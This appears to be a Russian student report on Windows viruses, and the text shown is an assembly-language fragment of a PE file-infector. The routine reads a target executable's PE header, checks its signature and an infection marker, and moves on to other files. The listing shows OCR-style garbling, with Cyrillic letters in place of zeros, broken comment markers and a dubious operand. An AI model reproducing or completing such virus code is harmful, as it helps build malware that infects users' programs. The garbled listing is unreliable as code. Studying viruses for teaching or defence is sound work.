Доклад: Вирусы под Windows

push О

push 3Ch

push dword ptr [ebp+offset ahand]

call SetFilePointer

;Считаем адрес РЕ-заголовка
push О

lea eax,[ebp+offset bytesread]
push eax
push 4

lea eax,[ebp+offset peheaderoffset]
push eax

push dword ptr [ebp+offset ahand]
call ReadFile

.Поставим указатель позиции чтения/записи на начало РЕ-заголовка
push О
push О

push dword ptr [ebp+offset peheaderoffset]
push dword ptr [ebp+offset ahand]
call SetFilePointer

;Считаем число байт, достаточное для вычисления полного размера
;РЕ-заголовка и таблицы объектов

push О

lea eax, [ebp+offset bytesread]

push eax

push 58h

lea eax, [ebp+offset peheader]

push eax

push dword ptr [ebp+offset ahand]

call ReadFile

[Проверим сигнатуру. Если ее нет, закрываем
;этот файл и ищем следующий

cmp dword ptr [ebp+offset peheader],00004550h;

jnz notape

.Проверим файл на зараженность. Если файл заражен,
;то закрываем этот файл и ищем следующий

cmp word ptr [ebp+offset peheader+4ch],OFOODh

jz notape

cmp dword ptr [ebp+offset 52],4000000h

jz notape

[Поставим указатель позиции чтения/записи на начало РЕ-заголовка
push О
push О

push dword ptr [ebp+offset peheaderoffset]
push dword ptr [ebp+offset ahand]
call SetFilePointer